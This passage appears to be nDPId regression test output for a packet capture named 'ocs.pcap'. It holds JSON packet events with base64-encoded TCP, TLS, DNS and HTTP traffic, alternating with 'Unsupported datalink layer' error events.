-00329{"packet_event_id":1,"packet_event_name":"packet","packet_id":25,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPCFMQABABqbowKi0AhcV5seZXwG7KAKjIAAAAACgAjkIsy4AAAIEBbQEAggKADWC0AAAAAABAwMG"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":26,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787196} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":26,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQLBkQABABm0\/wKi0Atg60C6hBwG7mRQzWuLMvMiwEADlgxwAAAEBCAoANYLTGASmTQEBBQrizMI04szHoA=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":27,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787196} -00337{"packet_event_id":1,"packet_event_name":"packet","packet_id":27,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQLBlQABABm0+wKi0Atg60C6hBwG7mRQzWuLMvMiwEADlffQAAAEBCAoANYLTGASmTQEBBQrizMI04szMyA=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":28,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787198} -00337{"packet_event_id":1,"packet_event_name":"packet","packet_id":28,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQLBmQABABm09wKi0Atg60C6hBwG7mRQzWuLMvMiwEADlfQgAAAEBCAoANYLTGASmTQEBBQrizMI04szNtA=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":29,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787263} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":29,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANLBnQABABm1IwKi0Atg60C6hBwG7mRQzWuLMzbSAEAES9ywAAAEBCAoANYLaGASmow=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":30,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787273} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":30,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANCFNQABABqbvwKi0AhcV5seZXwG7KAKjIVpZIEyAEADl\/h4AAAEBCAoANYLbl2cJ1g=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":31,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787289} -00617{"packet_event_id":1,"packet_event_name":"packet","packet_id":31,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":273,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":273,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQABESFOQABABqYRwKi0AhcV5seZXwG7KAKjIVpZIEyAGADlY\/8AAAEBCAoANYLdl2cJ1hYDAQDYAQAA1AMBVmhd8h0B5s6XDqG2jAg9OuLJnsmZQXwY4InZKY+7bC8AAEYABAAFAC8ANcACwATABcAMwA7AD8AHwAnACsARwBPAFAAzADkAMgA4AArAA8ANwAjAEgAWABMACQAVABIAAwAIABQAEQD\/AQAAZQAAAB0AGwAAGHNldHRpbmdzLmNyYXNobHl0aWNzLmNvbQALAAQDAAECAAoANAAyAAEAAgADAAQABQAGAAcACAAJAAoACwAMAA0ADgAPABAAEQASABMAFAAVABYAFwAYABkAIwAA"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":32,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787367} -00501{"packet_event_id":1,"packet_event_name":"packet","packet_id":32,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":186,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":186,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAurBoQABABmzBwKi0Atg60C6hBwG7mRQzWuLMzbSAGAES+5wAAAEBCAoANYLkGASmoxYDAQBGEAAAQkEEtWAMNyT8WKHJF1e4GiSzdqCN0TSkLYwOtSesvtnBVhYkRBeZO\/K8p4LN8s8Jty9T7ZTt1ySHOehqYl4AHTgJxhQDAQABARYDAQAwJqEJMKdFZ9Mms8ZGzC\/cweCNMfBdi4uNKuK5rwKcBTRo9TtFzZzevE7tcMv7cs5J"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":33,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787439} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":33,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANCFPQABABqbtwKi0AhcV5seZXwG7KAKj\/lpZJECAEAEE+OkAAAEBCAoANYLsl2cKCg=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":34,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787440} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":34,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANCFQQABABqbswKi0AhcV5seZXwG7KAKj\/lpZKDSAEAEk9NUAAAEBCAoANYLsl2cKCg=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":35,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787441} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":35,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANCFRQABABqbrwKi0AhcV5seZXwG7KAKj\/lpZLCiAEAFD8MIAAAEBCAoANYLsl2cKCg=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":36,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787446} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":36,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANCFSQABABqbqwKi0AhcV5seZXwG7KAKj\/lpZMByAEAFj7K4AAAEBCAoANYLsl2cKCg=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":37,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787449} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":37,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANCFTQABABqbpwKi0AhcV5seZXwG7KAKj\/lpZMEyAEAFj7H0AAAEBCAoANYLtl2cKCg=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":38,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787450} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":38,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANCFUQABABqbowKi0AhcV5seZXwG7KAKj\/lpZNECAEAGD6GgAAAEBCAoANYLtl2cKCw=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":39,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787450} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":39,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANCFVQABABqbnwKi0AhcV5seZXwG7KAKj\/lpZNxqAEAGi5W8AAAEBCAoANYLtl2cKCw=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":40,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787450} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":40,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANLBpQABABm1GwKi0Atg60C6hBwG7mRQz4OLMze+AEAES9aEAAAEBCAoANYLtGASnWg=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":41,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787476} -00825{"packet_event_id":1,"packet_event_name":"packet","packet_id":41,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":425,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":425,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQABqbBqQABABmvQwKi0Atg60C6hBwG7mRQz4OLMze+AGAESvZQAAAEBCAoANYLvGASnWhcDAQFwKRF6Hs138xqzSSTIriZENoZDD+Ps7xQU8y5e8AFQ1MsOn\/G\/D9cg0ADLlkME0QetySCnbmk6iG8A7aEhl+nQsJKwTwBrTxbZ9TZc9hfCbAirVxtgK+ltCRGV7EniRzNItI7oIVTmnc\/F0wYZKdcjIpaV+MQd9TewqJbzGGUCpPqBYg7KxDXNrQVm3B0Fxt8jMNgbd8Iv0g\/cO7uuKHxD3k8xD2GVoYCpSZ7EhxnTjpDeu9Z6URzQCjNhegZTPS8Mjgv0N4AflmIpmM83mIUN1xgCHuprdzS0qOxqY1sVbBrw8Wn4vVQwIrneHP3XsbO0p+HsV\/4FbzNhQWXl9aPFyUoXwnPqye30vPTjfPZX8Vy5oxfeAr6YVhNmbQdiU5Xr0ioTSseUBvaMdFq\/A6ZX7F9D0QhsgaFq5fR4Eqixt4Yj8GslDlIlZeNYHRALuYtqYYwcIxpmuEAItucppVp8Mw5W7ptH9Nii1iaVsgBO2AE="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":42,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787479} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":42,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANGAeQABABlqlwKi0AomHgc6vnwBQfAzi7h3gADyAEAD1OwIAAAEBCAoANYLwvXlNHw=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":43,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787495} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":43,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANJwkQABABqbFwKi0ArL40Da8egBQwI4he\/tL5z2AEAE9NLsAAAEBCAoANYLyRwX9Xw=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":44,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787496} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":44,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANGAfQABABlqkwKi0AomHgc6vnwBQfAzi7h3gADyAEQD1Ov8AAAEBCAoANYLyvXlNHw=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":45,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787507} -00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":45,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":77,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":77,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAATYLzQABAETLywKi0AggICAgOJQA1ADki+CcDAQAAAQAAAAAAAAR4bXBwCGRldmljZTA2BGV1MDEIY2FwcHRhaW4DY29tAAABAAE="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":46,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787572} -00504{"packet_event_id":1,"packet_event_name":"packet","packet_id":46,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":186,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":186,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAuiFWQABABqZgwKi0AhcV5seZXwG7KAKj\/lpZNxqAGAGiTIQAAAEBCAoANYL5l2cKCxYDAQBGEAAAQkEEQxTBHkOcJZa3UtHJhNGmWjQ4Dx7bFUjVN2PKz\/PauHV01A0axo1JmqhC6rF7p4wUlQv\/SnWqEFr7cFHdR3jTYhQDAQABARYDAQAwxhVM51WGMvU2teIXXp\/bO+aohaPJkVc3IJXZJLC40\/UHxaprojBHy27xbMJEaHjR"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":47,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787578} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":47,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANGAgQABABlqjwKi0AomHgc6vnwBQfAzi7x3gAD2AEAD1Ot8AAAEBCAoANYL6vXlNNg=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":48,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787596} -00330{"packet_event_id":1,"packet_event_name":"packet","packet_id":48,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPDy4QABABnydwKi0AomHgzS0VhQCr\/++QwAAAACgAjkI08UAAAIEBbQEAggKADWC+wAAAAABAwMG"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":49,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787735} -00371{"packet_event_id":1,"packet_event_name":"packet","packet_id":49,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":89,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":89,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAWbBrQABABm0fwKi0Atg60C6hBwG7mRQ1VeLMz\/SAGAE9BiIAAAEBCAoANYMJGASoRRUDAQAgW2F2BXSJbEV45GAiWlxvAXydyXjCtrAU+3YX\/LIm0J4="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":50,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787736} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":50,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANLBsQABABm1DwKi0Atg60C6hBwG7mRQ1euLMz\/SAEQE98M8AAAEBCAoANYMJGASoRQ=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":51,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787811} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":51,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANLBtQABABm1CwKi0Atg60C6hBwG7mRQ1e+LMz\/WAEAE98FEAAAEBCAoANYMRGASoug=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":52,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787896} -00504{"packet_event_id":1,"packet_event_name":"packet","packet_id":52,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":186,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":186,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAuiFXQABABqZfwKi0AhcV5seZXwG7KAKj\/lpZNxqAGAGiTGMAAAEBCAoANYMal2cKCxYDAQBGEAAAQkEEQxTBHkOcJZa3UtHJhNGmWjQ4Dx7bFUjVN2PKz\/PauHV01A0axo1JmqhC6rF7p4wUlQv\/SnWqEFr7cFHdR3jTYhQDAQABARYDAQAwxhVM51WGMvU2teIXXp\/bO+aohaPJkVc3IJXZJLC40\/UHxaprojBHy27xbMJEaHjR"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":53,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787983} -00329{"packet_event_id":1,"packet_event_name":"packet","packet_id":53,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPMDbQABABoIGwKi0ArL40DbC2QBQ64tD+QAAAACgAjkIoRgAAAIEBbQEAggKADWDIgAAAAABAwMG"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":54,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788016} -00333{"packet_event_id":1,"packet_event_name":"packet","packet_id":54,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPYMlQABAETLQwKi0AggICAgKHQA1ACmDzlLQAQAAAQAAAAAAAANvY3MIbGFiZ2VuY3kCd3MAAAEAAQ=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":55,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788067} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":55,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMDcQABABoINwKi0ArL40DbC2QBQ64tD+t7mVuSAEADljSkAAAEBCAoANYMrRwX98w=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":56,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788082} -01207{"packet_event_id":1,"packet_event_name":"packet","packet_id":56,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":715,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":715,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQACy8DdQABABn91wKi0ArL40DbC2QBQ64tD+t7mVuSAGADltWEAAAEBCAoANYMsRwX981BPU1QgL2NhdGFsb2cvdm9kP3Y9MyBIVFRQLzEuMQ0KWC1MZ3ktSHNzLUE6IEZGRTg2OUEyLTMzQUQtQTU0QS1CRUMwLTcyMTBEMDNDODM1Qi0yNTk0RDYzRA0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpYLUxneS1IU1MtU2VydmljZS1JZDogb2ZyLm9jcw0KWC1MZ3ktSFNTLVJvbS1JZDogc2Ftc3VuZy9HVC1QNzUxMC9BbmRyb2lkLzQuMC40L1hXTFA2L2FybXY3bF8xMDAwLjBNSHpfMTk5OC44NEJvZ29NaXBzX2ZlYXR1cmVzKHN3cCxoYWxmLHRodW1iLGZhc3RtdWx0LHZmcCxlZHNwLHZmcHYzLHZmcHYzZDE2LHRscylfY29yZXM9Mi8xMjgweDc1Mi9mYWxzZQ0KQ29udGVudC1MZW5ndGg6IDIxNw0KSG9zdDogb2N1MDMubGFiZ2VuY3kud3MNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEFwYWNoZS1IdHRwQ2xpZW50L1VOQVZBSUxBQkxFIChqYXZhIDEuNCkNCg0KPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPGxneXJlcXVlc3QgbW9kdWxlPSJDTS9WT0QiPgoJPGFjdGlvbiBuYW1lPSJnZXRDYXRhbG9nRW50cmllcyI+CgkJPHBhcmFtIG5hbWU9IndpdGhDdXN0b21EYXRhIiB2YWx1ZT0iZmFsc2UiLz4KCQk8cGFyYW0gbmFtZT0iZXh0ZXJuYWxJZCIgdmFsdWU9ImZhbHNlIi8+Cgk8L2FjdGlvbj4KPC9sZ3lyZXF1ZXN0Pg=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":57,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788109} -00329{"packet_event_id":1,"packet_event_name":"packet","packet_id":57,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPDlmQABABgl8wKi0ArL40DaPSAG7xoy6SQAAAACgAjkIgeAAAAIEBbQEAggKADWDLwAAAAABAwMG"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":58,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788188} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":58,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANDlnQABABgmDwKi0ArL40DaPSAG7xoy6Sjpn3PmAEADljD4AAAEBCAoANYM3RwX+EQ=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":59,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788195} -00600{"packet_event_id":1,"packet_event_name":"packet","packet_id":59,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":260,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":260,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQABBDloQABABgiywKi0ArL40DaPSAG7xoy6Sjpn3PmAGADlDAsAAAEBCAoANYM3RwX+ERYDAQDLAQAAxwMBVmhd83GqZqYQO3oMbwUHPK3VU0gJzqNSdwnP4gncj8QAAEYABAAFAC8ANcACwATABcAMwA7AD8AHwAnACsARwBPAFAAzADkAMgA4AArAA8ANwAjAEgAWABMACQAVABIAAwAIABQAEQD\/AQAAWAAAABQAEgAAD29jcy5sYWJnZW5jeS53cwALAAQDAAECAAoANAAyAAEAAgADAAQABQAGAAcACAAJAAoACwAMAA0ADgAPABAAEQASABMAFAAVABYAFwAYABk="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":60,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788316} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":60,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANCFYQABABqbkwKi0AhcV5seZXwG7KAKkhFpZOBSAEAHC4p8AAAEBCAoANYNEl2cK5A=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":61,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788328} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":61,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMDeQABABoH\/wKi0ArL40DbC2QBQ64tGkd7mVuSwEADl2G4AAAEBCAoANYNFRwX+CwEBBQre5lxQ3uZhvA=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":62,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788329} -00345{"packet_event_id":1,"packet_event_name":"packet","packet_id":62,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMDfQABABoH2wKi0ArL40DbC2QBQ64tGkd7mVuTQEADlJtQAAAEBCAoANYNFRwX+CwEBBRLe5mco3uZslN7mXFDe5mG8"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":63,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788329} -00345{"packet_event_id":1,"packet_event_name":"packet","packet_id":63,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMDgQABABoH1wKi0ArL40DbC2QBQ64tGkd7mVuTQEADlIWgAAAEBCAoANYNFRwX+CwEBBRLe5mco3uZyAN7mXFDe5mG8"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":64,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788353} -01893{"packet_event_id":1,"packet_event_name":"packet","packet_id":64,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1209,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1209,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAEuSFZQABABqJewKi0AhcV5seZXwG7KAKkhFpZOBSAGAHCXrEAAAEBCAoANYNHl2cK5BcDAQSA64QqDP2BWUMcNqI+0cGlP2J\/l2AU1ze1S5U4B\/8xLPWN3fAKvo5QYWryC6yDgqK5pz+PJc78o1pu1ZbKwOgR7+J1U3PYA7kZZWvOEMj8YsNCBHJIfntRMUxwbDUZBVTntgYcA3naC+XyBRk\/NA4H8n0\/n9PJ1Au6jN\/6S6WKKgYrCmj9wIO7i26hpiWhrLcpdh4\/sSEJTObMy+DZKrHgYcb2M8J0v7XjTzhpacsWnvjj+1TKMwTdIeAd16GrFY8eSjxEqZd6fitBrjBR6pKryKu6QxtRy0ikAlnoOvl8QxKaRq6\/OJtFkwg7RiJ2nhgLCNomFDCbLy1ctu89OBlt6tC0JNNs5KK1OOU3L1Z\/8DjujU6MlUx5PcwoXou2tpey0mrOLA0bi\/VC++Pg52QKnubndb0t\/U